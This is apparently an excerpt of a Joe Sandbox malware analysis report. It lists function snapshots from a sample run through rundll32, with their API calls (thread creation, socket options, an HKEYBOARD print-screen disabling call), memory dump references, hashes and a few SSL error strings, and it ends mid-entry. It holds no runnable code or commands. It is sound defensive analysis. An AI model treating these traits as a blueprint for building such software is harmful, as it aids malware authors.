                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Time$CreateCriticalEventFileInitializeSectionStartupSystem__aulldiv__getptd__time64
                    • String ID:
                    • API String ID: 2538592855-0
                    • Opcode ID: e2f87f3476f6211739eb1c79cebd885f95b84e17ea6e261edbfc40e53e564a4b
                    • Instruction ID: 95c3ddccc1b3c2a836e7e35d082aa0d444f4c8ff535cfa7b2b072766d0957f0b
                    • Opcode Fuzzy Hash: e2f87f3476f6211739eb1c79cebd885f95b84e17ea6e261edbfc40e53e564a4b
                    • Instruction Fuzzy Hash: E811E6B0900B059FD3209F7AD985A97FBE8FF08305F404A6EA59E82641D734B9058F95
                    APIs
                    • std::_Lockit::_Lockit.LIBCPMT ref: 6CFF5362
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,00000000,?,?,?,?,?,6CFF5205,?,?,6CFF5280), ref: 6CFF5389
                    • ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(00000001,?,00000000,?,?,?,?,?,6CFF5205,?,?,6CFF5280), ref: 6CFF53A3
                    • std::_Lockit::~_Lockit.LIBCPMT ref: 6CFF53BE
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisableLockitPrintScreen@@std::_$Lockit::_Lockit::~_
                    • String ID:
                    • API String ID: 3731820245-0
                    • Opcode ID: fd7679c92e03bfb822c6bc4ccf0b4a2fac386ce6ab9e43e72c37906ed0baf28a
                    • Instruction ID: 65e89c0c02604f963c1efc27ac79f0fffa08dd4231a777c15f2c287aa730f686
                    • Opcode Fuzzy Hash: fd7679c92e03bfb822c6bc4ccf0b4a2fac386ce6ab9e43e72c37906ed0baf28a
                    • Instruction Fuzzy Hash: FB01B135A00619EFDB05DB59C884E9D7BB9EF85724B2440A9E8119B3B0DFB0EE45CB90
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: fa3a59b6393a6b0400569d824b2023dcc40042c40aee3e76371ac1ea7eeb76eb
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: AD114C3240014EBBDF265F84DC01CEE3F66BB59358B59A415FE1859030D236E6B2AB81
                    APIs
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: 32d3dc77a8cbf064bc44ec169d9c30422e597aee78b49983ac53954a3ee4a0f6
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: 6C114C3604014AFBCF265F98CC81CEE3F66BB18358B489955FE9959130D336E9B1AB81
                    APIs
                    • __getptd.LIBCMT ref: 04ED9DCB
                      • Part of subcall function 04ED3A90: __getptd_noexit.LIBCMT ref: 04ED3A93
                      • Part of subcall function 04ED3A90: __amsg_exit.LIBCMT ref: 04ED3AA0
                    • __amsg_exit.LIBCMT ref: 04ED9DEB
                    • __lock.LIBCMT ref: 04ED9DFB
                    • _free.LIBCMT ref: 04ED9E2B
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
                    • String ID:
                    • API String ID: 3170801528-0
                    • Opcode ID: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
                    • Instruction ID: 99b3cfcdcd01a2b4cbaabd7edb963b27e885b9139ba2b5430b3269ab0c805cdc
                    • Opcode Fuzzy Hash: 81631af5cdc54498fe778bca56b1344b950f0aced79e833b94f8be01018399a1
                    • Instruction Fuzzy Hash: 21018075D01771EBEB21AF688C8579EB7A0BF04718F046519EC05A7291CB34B943CBD1
                    APIs
                    • _malloc.LIBCMT ref: 04ED1EC0
                      • Part of subcall function 04ED2C06: __FF_MSGBANNER.LIBCMT ref: 04ED2C1F
                      • Part of subcall function 04ED2C06: __NMSG_WRITE.LIBCMT ref: 04ED2C26
                    • std::exception::exception.LIBCMT ref: 04ED1EF5
                    • std::exception::exception.LIBCMT ref: 04ED1F0F
                    • __CxxThrowException@8.LIBCMT ref: 04ED1F20
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8Throw_malloc
                    • String ID:
                    • API String ID: 2388904642-0
                    • Opcode ID: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
                    • Instruction ID: a25d134f580bd5fa0c129ffef99ab1171effefeefef8da85d7468f7eeb158062
                    • Opcode Fuzzy Hash: f51ddbd8e2a9470a2d3d1d33b4ea24292f5693e40e108262bbab9c00d36db973
                    • Instruction Fuzzy Hash: 6FF0F4749002196AEF14EB94CC44AAEBBB9FF4020CF40155DED05AA090CB75FB438752
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,6D066193,00000000,?,6D06C7D2,6D066193,6D066193,?,?,00000000,00000104,?,00000001), ref: 6D06604A
                    • GetLastError.KERNEL32(?,6D06C7D2,6D066193,6D066193,?,?,00000000,00000104,?,00000001,00000000,00000000,?,6D066193,?,00000104), ref: 6D066054
                    • __dosmaperr.LIBCMT ref: 6D06605B
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,6D06C7D2,6D066193,6D066193,?,?,00000000,00000104,?,00000001,00000000), ref: 6D066085
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: FullNamePath$ErrorLast__dosmaperr
                    • String ID:
                    • API String ID: 1391015842-0
                    • Opcode ID: 47ca522f6425275d734f9d891aeccb2174a88b0096a38b5ee6c2996d4724c212
                    • Instruction ID: 9d70057b6ba1e4741ca69d906497d991e1945d19f3a5e8ff7e89097f4a4e8797
                    • Opcode Fuzzy Hash: 47ca522f6425275d734f9d891aeccb2174a88b0096a38b5ee6c2996d4724c212
                    • Instruction Fuzzy Hash: FAF03176204251AFFB205F76C804F6BBBFAEF463607508969E659D7010DB72E4208BA0
                    APIs
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,6D066193,00000000,?,6D06C844,6D066193,?,?,00000000,00000104,?,00000001,00000000), ref: 6D0660B0
                    • GetLastError.KERNEL32(?,6D06C844,6D066193,?,?,00000000,00000104,?,00000001,00000000,00000000,?,6D066193,?,00000104,?), ref: 6D0660BA
                    • __dosmaperr.LIBCMT ref: 6D0660C1
                    • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,6D06C844,6D066193,?,?,00000000,00000104,?,00000001,00000000,00000000), ref: 6D0660EB
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: FullNamePath$ErrorLast__dosmaperr
                    • String ID:
                    • API String ID: 1391015842-0
                    • Opcode ID: 84c76b9ccb483f05389bea00b31f894dac2ae535ca1e833972c18f1915ebd23d
                    • Instruction ID: 9516e8d57a1b96e380dbd5990dc791740410461efd01b35c98339a0ed2377a85
                    • Opcode Fuzzy Hash: 84c76b9ccb483f05389bea00b31f894dac2ae535ca1e833972c18f1915ebd23d
                    • Instruction Fuzzy Hash: 5AF03136304211AFFB215F66C804F5B7BF9EF463647518839EA5AD7110DB72E4208BA0
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 04EC3738
                    • CreateThread.KERNEL32(00000000,00000000,Function_00013690,?,00000000,00000000), ref: 04EC3752
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 04EC3760
                    • CloseHandle.KERNEL32(?), ref: 04EC376A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Create$CloseEventHandleObjectSingleThreadWait
                    • String ID:
                    • API String ID: 3360349984-0
                    • Opcode ID: f4641e9a4e113cab7239f76a23a7d373c5850bb57eeac6fba91034e70fad5df0
                    • Instruction ID: 132568387c69c9279ff09151af7b9be7a234971a79679f5c0eb0568dfb5f5714
                    • Opcode Fuzzy Hash: f4641e9a4e113cab7239f76a23a7d373c5850bb57eeac6fba91034e70fad5df0
                    • Instruction Fuzzy Hash: 55F0B4B5E44318BBD710DBA4DC4AF9E7B74EB04B11F2042A5FA14A73C1D6B46A008BD8
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 04EC5A2A
                    • _memset.LIBCMT ref: 04EC5A48
                    • _strncpy.LIBCMT ref: 04EC5A57
                    • GetTickCount.KERNEL32 ref: 04EC5A72
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: CountCreateEventTick_memset_strncpy
                    • String ID:
                    • API String ID: 2595203753-0
                    • Opcode ID: dd5329d3e76c7d352649f199324fc852b23b64afd7c7f978a0298d42d10715e0
                    • Instruction ID: 8c6c5f27111052adc23bc384c8c1217eec02825721f17993d702940eb0c0a464
                    • Opcode Fuzzy Hash: dd5329d3e76c7d352649f199324fc852b23b64afd7c7f978a0298d42d10715e0
                    • Instruction Fuzzy Hash: 4AF0AFB0640B01AFE330DF51D946B43BBE8EF04B00F00892EEA898B681E3B0B045CB95
                    APIs
                    • WriteConsoleW.KERNEL32(00000000,6D0642E9,00000000,00000000,00000000,?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000), ref: 6D06CDD0
                    • GetLastError.KERNEL32(?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000,?,?,?,6D05EFBB,?), ref: 6D06CDDC
                      • Part of subcall function 6D06CDA2: CloseHandle.KERNEL32(FFFFFFFE,6D06CDEC,?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000,?,?), ref: 6D06CDB2
                    • ___initconout.LIBCMT ref: 6D06CDEC
                      • Part of subcall function 6D06CD64: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6D06CD93,6D067E6F,?,?,6D05E9E1,?,00000000,00000000,?), ref: 6D06CD77
                    • WriteConsoleW.KERNEL32(00000000,6D0642E9,00000000,00000000,?,6D067E82,00000000,00000001,00000000,?,?,6D05E9E1,?,00000000,00000000,?), ref: 6D06CE01
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                    • String ID:
                    • API String ID: 2744216297-0
                    • Opcode ID: 88c4ba27c8615083f912be8b4344a25e46fc37b47dd0ac2ba5f6ff0b24665f6c
                    • Instruction ID: 74a3d166825a90ad87257dace9c86aea982e679827cc3d06b8303da5817042d1
                    • Opcode Fuzzy Hash: 88c4ba27c8615083f912be8b4344a25e46fc37b47dd0ac2ba5f6ff0b24665f6c
                    • Instruction Fuzzy Hash: 69F01C36904265BBCF121F92CC08F8D3F76EF4A3A1F054110FA1A96120DB328960DBE5
                    Strings
                    • select/poll on SSL socket, errno: %d, xrefs: 6D01CB3A
                    • schannel: timed out sending data (bytes sent: %zd), xrefs: 6D01CB55
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                    • API String ID: 0-3891197721
                    • Opcode ID: 0d4ff26e5addeba87ff16ec539b2eb183694e22282d7e0a388939124360d68b5
                    • Instruction ID: 78033c2260181309ff478cbc16e2e3eb12551eb5998dc0ade8ae69cc5e91f418
                    • Opcode Fuzzy Hash: 0d4ff26e5addeba87ff16ec539b2eb183694e22282d7e0a388939124360d68b5
                    • Instruction Fuzzy Hash: 89814AB56083419FE704CF68CC80B2ABBE5BF89728F544A2DF56987391D771E904CB92
                    Strings
                    • select/poll on SSL/TLS socket, errno: %d, xrefs: 6D01F509
                    • SSL/TLS connection timeout, xrefs: 6D01F524
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID:
                    • String ID: SSL/TLS connection timeout$select/poll on SSL/TLS socket, errno: %d
                    • API String ID: 0-3791222319
                    • Opcode ID: cb9e977bf861f0654ff1e0674a4b1f2fd32b612b34fa53dc49c44302a602a576
                    • Instruction ID: f7614948496ae95599cdf9b653b770986927b70adf9528558a9b966041289d2d
                    • Opcode Fuzzy Hash: cb9e977bf861f0654ff1e0674a4b1f2fd32b612b34fa53dc49c44302a602a576
                    • Instruction Fuzzy Hash: EC513A73A0C3015BF310C958BC81B7BBFE8EBC6324F140569EE5997241E725E548C762
                    APIs
                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CFF1DAF
                      • Part of subcall function 6D04A35E: ?SetDisablePrintScreen@@YAXH@Z.HKEYBOARD(?,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A38E
                      • Part of subcall function 6D04A35E: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,6CFF5117,?,6D086668,?,?,?,?,?,?), ref: 6D04A3BE
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: DisableExceptionPrintRaiseScreen@@___std_exception_copy
                    • String ID: ios_base::badbit set$ios_base::failbit set
                    • API String ID: 1900483484-1240500531
                    • Opcode ID: f94d376f9b9061849175b34b5c46d8a97a8134f312962049eb05aa376008dfcb
                    • Instruction ID: 07970daecceb6712e5772ab449493ef7b5e543d0a56faba1d1482d2cea99c2de
                    • Opcode Fuzzy Hash: f94d376f9b9061849175b34b5c46d8a97a8134f312962049eb05aa376008dfcb
                    • Instruction Fuzzy Hash: A451E5B1914204ABDB04CF58C840BAEF7B8EF45314F14C22AF924AB790E731A905CBA1
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB1584
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB159F
                      • Part of subcall function 04EB1740: std::_Xinvalid_argument.LIBCPMT ref: 04EB1758
                      • Part of subcall function 04EB1740: std::_Xinvalid_argument.LIBCPMT ref: 04EB1776
                      • Part of subcall function 04EB1740: std::_Xinvalid_argument.LIBCPMT ref: 04EB1791
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: Xinvalid_argumentstd::_
                    • String ID: string too long
                    • API String ID: 909987262-2556327735
                    • Opcode ID: 0df1afea07b5d88e829e05c0c4d81c104534c110a957e47d9efb41d2871ad5f2
                    • Instruction ID: 534e24ab80344e419c76eff6133ea0a396a47a7e2d9864cc82de01e1b16bfa2b
                    • Opcode Fuzzy Hash: 0df1afea07b5d88e829e05c0c4d81c104534c110a957e47d9efb41d2871ad5f2
                    • Instruction Fuzzy Hash: 1431DA727012109BD724CE6CE8A09DBF3E9EF517B47109A2AE1C2C7640D771F84187E4
                    APIs
                    • EncodePointer.KERNEL32(00000000,?), ref: 6D04D0BB
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: EncodePointer
                    • String ID: MOC$RCC
                    • API String ID: 2118026453-2084237596
                    • Opcode ID: b3aebb0fc5845ba83fb9c174b75fb11e8a79f1a5bb787e5cabafc2e9d6cb572a
                    • Instruction ID: eca0da24489544bf6ef3187205068a0b30170c45fd721a1433535f09b56cd21a
                    • Opcode Fuzzy Hash: b3aebb0fc5845ba83fb9c174b75fb11e8a79f1a5bb787e5cabafc2e9d6cb572a
                    • Instruction Fuzzy Hash: C741367290010AFFEF06DF94CD80FAE7BB5AF89304F158169FA1567225D335A950DB60
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04ED0C22
                      • Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED15F6
                      • Part of subcall function 04ED15E1: __CxxThrowException@8.LIBCMT ref: 04ED160B
                      • Part of subcall function 04ED15E1: std::exception::exception.LIBCMT ref: 04ED161C
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                    • String ID: yxxx$yxxx
                    • API String ID: 1823113695-1021751087
                    • Opcode ID: 0ab86c83bd60fbd051862dba59883beed7d65e1a0080c295507c0c0d0550e7cd
                    • Instruction ID: e85897c78fbb614e0299e1c0274d688210ffb82cecabae97557f8b3b79b29033
                    • Opcode Fuzzy Hash: 0ab86c83bd60fbd051862dba59883beed7d65e1a0080c295507c0c0d0550e7cd
                    • Instruction Fuzzy Hash: E121CCB2E002199BD30CDF58CDC1A6EB7E6E784314F25463AFD059B751EA35A941CB90
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D00B76D
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.4692328179.000000006CFF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CFF0000, based on PE: true
                    • Associated: 00000003.00000002.4692305101.000000006CFF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692403575.000000006D089000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000003.00000002.4692424101.000000006D08C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_6cff0000_rundll32.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: ipv4$ipv6
                    • API String ID: 885266447-982188191
                    • Opcode ID: 33029e82e7733b691101d3672ee7bb2304b8a3edcccf6674cbe28e267d9ebf70
                    • Instruction ID: 594b51a4f1c1fd83bfbc2af61e8f51dc965c4d65dcfb3492ac9e9f47e8fb36de
                    • Opcode Fuzzy Hash: 33029e82e7733b691101d3672ee7bb2304b8a3edcccf6674cbe28e267d9ebf70
                    • Instruction Fuzzy Hash: EB21D375A09701EBE761CF19C580B4AFBE1BB89751F508A2EE9898B750D370E9418F42
                    APIs
                    • std::_Xinvalid_argument.LIBCPMT ref: 04EB1A3F
                      • Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB2192
                      • Part of subcall function 04EB217D: __CxxThrowException@8.LIBCMT ref: 04EB21A7
                      • Part of subcall function 04EB217D: std::exception::exception.LIBCMT ref: 04EB21B8
                    • _memmove.LIBCMT ref: 04EB1A75
                    Strings
                    • invalid string position, xrefs: 04EB1A3A
                    Memory Dump Source
                    • Source File: 00000003.00000002.4691929038.0000000004EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04EB0000, based on PE: true
                    • Associated: 00000003.00000002.4691929038.0000000004EF2000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EF6000.00000040.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000003.00000002.4691929038.0000000004EFA000.00000040.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_4eb0000_rundll32.jbxd
                    Similarity
                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                    • String ID: invalid string position
                    • API String ID: 1785806476-1799206989
                    • Opcode ID: b5f7a4177472af0aca09a0761175e1b03fc903dbb8123b756b858d579aade8e7
                    • Instruction ID: bdc68daf5a24ce90b6348e38fbe94cab6b994c5589b6b4d5d8d47616d66ed957
                    • Opcode Fuzzy Hash: b5f7a4177472af0aca09a0761175e1b03fc903dbb8123b756b858d579aade8e7
                    • Instruction Fuzzy Hash: 51014F313046018BD3258A6CE9A46ABF6E69BC1BA4B246F2CE1D5C7749D6B1FC4287D0
                    APIs
                    • getsockopt.WS2_32(?,0000FFFF,00001001,00004020,?), ref: 6D03657E
                    • setsockopt.WS2_32(?,0000FFFF,00001001,?,00000004), ref: 6D0365A6
                      • Part of subcall function 6D03B400: GetModuleHandleA.KERNEL32(ntdll,RtlVerifyVersionInfo,00000000,?), ref: 6D03B42E
                      • Part of subcall function 6D03B400: GetProcAddress.KERNEL32(00000000), ref: 6D03B435
                    Strings
                    Memory Dump Source
